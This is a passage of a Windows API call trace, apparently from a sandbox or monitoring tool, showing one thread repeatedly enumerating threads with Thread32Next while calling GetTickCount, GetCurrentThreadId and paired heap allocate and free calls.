[0168.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.540] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.541] GetTickCount () returned 0x1159722 [0168.541] GetCurrentThreadId () returned 0x324 [0168.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.541] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.542] GetTickCount () returned 0x1159722 [0168.542] GetCurrentThreadId () returned 0x324 [0168.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.542] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.543] GetTickCount () returned 0x1159722 [0168.543] GetCurrentThreadId () returned 0x324 [0168.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.543] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.544] GetTickCount () returned 0x1159722 [0168.544] GetCurrentThreadId () returned 0x324 [0168.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.544] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.545] GetTickCount () returned 0x1159722 [0168.545] GetCurrentThreadId () returned 0x324 [0168.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.545] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.545] GetTickCount () returned 0x1159722 [0168.545] GetCurrentThreadId () returned 0x324 [0168.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.546] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.546] GetTickCount () returned 0x1159731 [0168.546] GetCurrentThreadId () returned 0x324 [0168.546] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.546] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.546] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.547] GetTickCount () returned 0x1159731 [0168.547] GetCurrentThreadId () returned 0x324 [0168.547] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.547] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.547] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.548] GetTickCount () returned 0x1159731 [0168.548] GetCurrentThreadId () returned 0x324 [0168.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.549] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.549] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.550] GetTickCount () returned 0x1159731 [0168.550] GetCurrentThreadId () returned 0x324 [0168.550] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.550] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.550] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.551] GetTickCount () returned 0x1159731 [0168.551] GetCurrentThreadId () returned 0x324 [0168.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.551] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.551] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.551] GetTickCount () returned 0x1159731 [0168.551] GetCurrentThreadId () returned 0x324 [0168.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.552] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.552] GetTickCount () returned 0x1159731 [0168.552] GetCurrentThreadId () returned 0x324 [0168.552] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.552] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.552] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.553] GetTickCount () returned 0x1159731 [0168.553] GetCurrentThreadId () returned 0x324 [0168.553] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.553] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.553] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.554] GetTickCount () returned 0x1159731 [0168.554] GetCurrentThreadId () returned 0x324 [0168.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.554] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.554] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.555] GetTickCount () returned 0x1159731 [0168.555] GetCurrentThreadId () returned 0x324 [0168.555] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.555] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.555] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.556] GetTickCount () returned 0x1159731 [0168.556] GetCurrentThreadId () returned 0x324 [0168.556] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.556] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.556] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.557] GetTickCount () returned 0x1159731 [0168.557] GetCurrentThreadId () returned 0x324 [0168.557] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.557] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.557] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.557] GetTickCount () returned 0x1159731 [0168.557] GetCurrentThreadId () returned 0x324 [0168.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.558] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.558] GetTickCount () returned 0x1159731 [0168.558] GetCurrentThreadId () returned 0x324 [0168.558] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.558] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.559] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.559] GetTickCount () returned 0x1159731 [0168.559] GetCurrentThreadId () returned 0x324 [0168.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.559] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.559] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.560] GetTickCount () returned 0x1159731 [0168.560] GetCurrentThreadId () returned 0x324 [0168.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.560] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.561] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.561] GetTickCount () returned 0x1159741 [0168.561] GetCurrentThreadId () returned 0x324 [0168.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.561] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.562] GetTickCount () returned 0x1159741 [0168.562] GetCurrentThreadId () returned 0x324 [0168.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.562] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.563] GetTickCount () returned 0x1159741 [0168.563] GetCurrentThreadId () returned 0x324 [0168.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.563] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.564] GetTickCount () returned 0x1159741 [0168.564] GetCurrentThreadId () returned 0x324 [0168.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.564] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.565] GetTickCount () returned 0x1159741 [0168.565] GetCurrentThreadId () returned 0x324 [0168.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.565] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.566] GetTickCount () returned 0x1159741 [0168.566] GetCurrentThreadId () returned 0x324 [0168.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.566] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.567] GetTickCount () returned 0x1159741 [0168.567] GetCurrentThreadId () returned 0x324 [0168.567] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.567] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.567] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.568] GetTickCount () returned 0x1159741 [0168.568] GetCurrentThreadId () returned 0x324 [0168.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.568] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.569] GetTickCount () returned 0x1159741 [0168.569] GetCurrentThreadId () returned 0x324 [0168.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.570] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.570] GetTickCount () returned 0x1159741 [0168.570] GetCurrentThreadId () returned 0x324 [0168.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.570] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.570] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.571] GetTickCount () returned 0x1159741 [0168.571] GetCurrentThreadId () returned 0x324 [0168.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.571] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.572] GetTickCount () returned 0x1159741 [0168.572] GetCurrentThreadId () returned 0x324 [0168.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.573] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.573] GetTickCount () returned 0x1159741 [0168.573] GetCurrentThreadId () returned 0x324 [0168.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.573] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.574] GetTickCount () returned 0x1159741 [0168.574] GetCurrentThreadId () returned 0x324 [0168.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.574] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.575] GetTickCount () returned 0x1159741 [0168.575] GetCurrentThreadId () returned 0x324 [0168.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.575] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.576] GetTickCount () returned 0x1159741 [0168.576] GetCurrentThreadId () returned 0x324 [0168.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.576] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.578] GetTickCount () returned 0x1159750 [0168.579] GetCurrentThreadId () returned 0x324 [0168.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.579] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.580] GetTickCount () returned 0x1159750 [0168.580] GetCurrentThreadId () returned 0x324 [0168.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.580] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.581] GetTickCount () returned 0x1159750 [0168.581] GetCurrentThreadId () returned 0x324 [0168.581] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.581] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.581] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.582] GetTickCount () returned 0x1159750 [0168.582] GetCurrentThreadId () returned 0x324 [0168.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.582] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.582] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.584] GetTickCount () returned 0x1159750 [0168.584] GetCurrentThreadId () returned 0x324 [0168.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.584] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.584] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.585] GetTickCount () returned 0x1159750 [0168.585] GetCurrentThreadId () returned 0x324 [0168.585] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.585] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.585] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.587] GetTickCount () returned 0x1159750 [0168.587] GetCurrentThreadId () returned 0x324 [0168.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.587] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.587] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.588] GetTickCount () returned 0x1159750 [0168.588] GetCurrentThreadId () returned 0x324 [0168.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.588] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.588] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.589] GetTickCount () returned 0x1159750 [0168.589] GetCurrentThreadId () returned 0x324 [0168.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.589] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.590] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.591] GetTickCount () returned 0x1159750 [0168.591] GetCurrentThreadId () returned 0x324 [0168.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.591] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.592] GetTickCount () returned 0x1159750 [0168.592] GetCurrentThreadId () returned 0x324 [0168.592] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.592] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.593] GetTickCount () returned 0x1159760 [0168.593] GetCurrentThreadId () returned 0x324 [0168.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.594] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.594] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.595] GetTickCount () returned 0x1159760 [0168.595] GetCurrentThreadId () returned 0x324 [0168.595] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.595] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.595] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.597] GetTickCount () returned 0x1159760 [0168.597] GetCurrentThreadId () returned 0x324 [0168.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.597] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.597] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.598] GetTickCount () returned 0x1159760 [0168.598] GetCurrentThreadId () returned 0x324 [0168.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.598] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.598] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.599] GetTickCount () returned 0x1159760 [0168.599] GetCurrentThreadId () returned 0x324 [0168.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.599] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.601] GetTickCount () returned 0x1159760 [0168.601] GetCurrentThreadId () returned 0x324 [0168.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.601] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.602] GetTickCount () returned 0x1159760 [0168.602] GetCurrentThreadId () returned 0x324 [0168.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.602] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.603] GetTickCount () returned 0x1159760 [0168.603] GetCurrentThreadId () returned 0x324 [0168.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.604] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.604] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.605] GetTickCount () returned 0x1159760 [0168.605] GetCurrentThreadId () returned 0x324 [0168.605] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.605] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.605] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.606] GetTickCount () returned 0x1159760 [0168.606] GetCurrentThreadId () returned 0x324 [0168.606] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.606] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.606] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.608] GetTickCount () returned 0x1159760 [0168.608] GetCurrentThreadId () returned 0x324 [0168.608] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.608] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.625] GetTickCount () returned 0x115977f [0168.625] GetCurrentThreadId () returned 0x324 [0168.625] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.625] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.625] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.626] GetTickCount () returned 0x115977f [0168.626] GetCurrentThreadId () returned 0x324 [0168.626] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.626] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.626] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.627] GetTickCount () returned 0x115977f [0168.627] GetCurrentThreadId () returned 0x324 [0168.627] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.627] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.627] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.627] GetTickCount () returned 0x115977f [0168.628] GetCurrentThreadId () returned 0x324 [0168.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.628] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.628] GetTickCount () returned 0x115977f [0168.628] GetCurrentThreadId () returned 0x324 [0168.628] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.628] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.628] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.629] GetTickCount () returned 0x115977f [0168.629] GetCurrentThreadId () returned 0x324 [0168.629] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.629] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.629] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.630] GetTickCount () returned 0x115977f [0168.630] GetCurrentThreadId () returned 0x324 [0168.630] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.630] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.630] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.631] GetTickCount () returned 0x115977f [0168.631] GetCurrentThreadId () returned 0x324 [0168.631] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.631] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.631] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.632] GetTickCount () returned 0x115977f [0168.632] GetCurrentThreadId () returned 0x324 [0168.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.632] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.632] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.632] GetTickCount () returned 0x115977f [0168.632] GetCurrentThreadId () returned 0x324 [0168.632] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.633] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.633] Thread32Next (hSnapshot=0x674, lpte=0x401f434) returned 1 [0168.633] GetTickCount () returned 0x115977f [0168.633] GetCurrentThreadId () returned 0x324 [0168.633] RtlAllocateHeap 